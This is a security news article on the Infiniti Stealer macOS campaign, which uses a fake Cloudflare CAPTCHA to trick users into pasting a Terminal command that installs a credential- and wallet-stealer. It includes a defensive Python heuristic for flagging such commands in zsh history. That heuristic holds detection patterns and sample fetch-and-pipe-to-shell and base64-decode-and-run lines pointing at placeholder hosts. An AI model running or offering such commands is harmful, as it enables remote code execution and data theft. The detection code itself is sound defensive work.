The Infiniti Stealer malware spreads through a fake Cloudflare CAPTCHA page, targeting cryptocurrency wallets and sensitive data on macOS, amid industry-wide losses projected to reach $3.4 billion in 2025.
Security researchers from Malwarebytes have just discovered a new attack campaign targeting users of crypto assets on macOS, using a fake CAPTCHA page mimicking Cloudflare's verification interface to distribute data-stealing software called Infiniti Stealer.
The worrying aspect of this campaign is its infection mechanism: instead of exploiting system vulnerabilities, the attackers trick users into executing malicious commands themselves, a technique known as ClickFix that is common on Windows and is now being adapted to the Apple ecosystem.
macOS is no longer a safe zone against malware that steals cryptographic assets.
The attack chain is designed to bypass traditional defenses. Users land on a website whose domain impersonates an update-checking service and which displays a CAPTCHA interface identical to Cloudflare's. After clicking to confirm, the page asks them to open Terminal and paste a command presented as a standard verification step.
That command is in fact a hidden installation script that connects to a remote command-and-control server to download and deploy Infiniti Stealer without displaying any warnings. The malware is compiled as a native macOS binary rather than shipped as an easily readable script, making analysis and detection significantly more difficult.
After a successful intrusion, Infiniti Stealer extracts cryptocurrency wallet data, browser login credentials, macOS Keychain data, developer text files, and screenshots taken during execution. It also includes a check for analysis environments to evade inspection, sends a Telegram notification once extraction completes, and adds the collected credentials to a server-side password-cracking queue.
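As an added illustration of the infection step described above (this is not code from Malwarebytes' report or from the article), the following defender-side triage heuristic scans zsh history, macOS's default shell, for one-liners matching the "paste this into Terminal" pattern: remote content fetched and handed straight to an interpreter, or a base64 blob decoded and executed. The history entries and domains are constructed samples, not real indicators.

```python
# Triage heuristic for ClickFix-style "paste into Terminal" lures on macOS.
# It surfaces candidate history entries for an analyst to review; it does not
# judge intent by itself. Handles zsh EXTENDED_HISTORY lines and plain lines.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# zsh EXTENDED_HISTORY format: ": <epoch>:<duration>;<command>"
_EXT_HIST = re.compile(r"^: (\d+):\d+;(.*)$")
_FETCH = re.compile(r"\b(curl|wget)\b")
# "| bash", "| sh", "| sudo zsh", "| python3", "| osascript"
_PIPE_TO_INTERP = re.compile(r"\|\s*(?:sudo\s+)?(?:(?:ba|z|k)?sh|python3?|osascript)\b")
_B64_DECODE = re.compile(r"base64\s+(?:-d|--decode|-D)\b")
# eval of fetched text, or fetched text used via $(curl ...) substitution
_EVAL = re.compile(r"\beval\b|\$\(\s*(?:curl|wget)\b")

@dataclass
class Finding:
    timestamp: Optional[int]   # None when the line lacks the extended prefix
    command: str
    reasons: List[str]

def parse_history_line(line: str) -> Tuple[Optional[int], str]:
    m = _EXT_HIST.match(line.rstrip("\n"))
    if m:
        return int(m.group(1)), m.group(2)
    return None, line.strip()

def assess(command: str) -> List[str]:
    reasons = []
    fetched = bool(_FETCH.search(command))
    if fetched and _PIPE_TO_INTERP.search(command):
        reasons.append("remote content piped directly to an interpreter")
    if fetched and _EVAL.search(command):
        reasons.append("remote content executed via eval/command substitution")
    if _B64_DECODE.search(command) and (_PIPE_TO_INTERP.search(command) or _EVAL.search(command)):
        reasons.append("base64-obfuscated payload decoded and executed")
    return reasons

def flag_clickfix_candidates(history_lines: List[str]) -> List[Finding]:
    findings = []
    for line in history_lines:
        ts, cmd = parse_history_line(line)
        reasons = assess(cmd) if cmd else []
        if reasons:
            findings.append(Finding(ts, cmd, reasons))
    return findings

# Constructed sample history (the .invalid TLD never resolves); not real IoCs.
SAMPLE_HISTORY = [
    ": 1712345600:0;git status",
    ": 1712345660:0;curl -fsSL https://verify.example.invalid/check.sh | bash",
    ": 1712345720:0;echo 'aGVsbG8=' | base64 -d | sh",
    ": 1712345780:0;curl -O https://example.invalid/report.pdf",  # plain download: not flagged
    "brew update",
]

if __name__ == "__main__":
    for f in flag_clickfix_candidates(SAMPLE_HISTORY):
        print(f.timestamp, f.command, "->", "; ".join(f.reasons))
```

Run against `~/.zsh_history` (or the `/var/log/install.log`-style sources an EDR collects) during triage; a match is a lead for review, since legitimate install one-liners use the same shape.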
This is not an isolated threat. Last March, the GhostClaw malware was distributed via npm, a popular JavaScript package manager, under the guise of a legitimate tool called OpenClaw, deploying a multi-stage attack to steal private keys and wallet access before being removed after 178 developers had downloaded it.
The broader picture reveals the severity of this trend: according to Chainalysis, the proportion of personal wallet breaches in total stolen value increased from 7.3% in 2022 to 44% in 2024, while total industry losses in 2025 reached $3.4 billion.
For macOS users, the simplest recommended practice is to absolutely never paste commands into Terminal from any unverified source.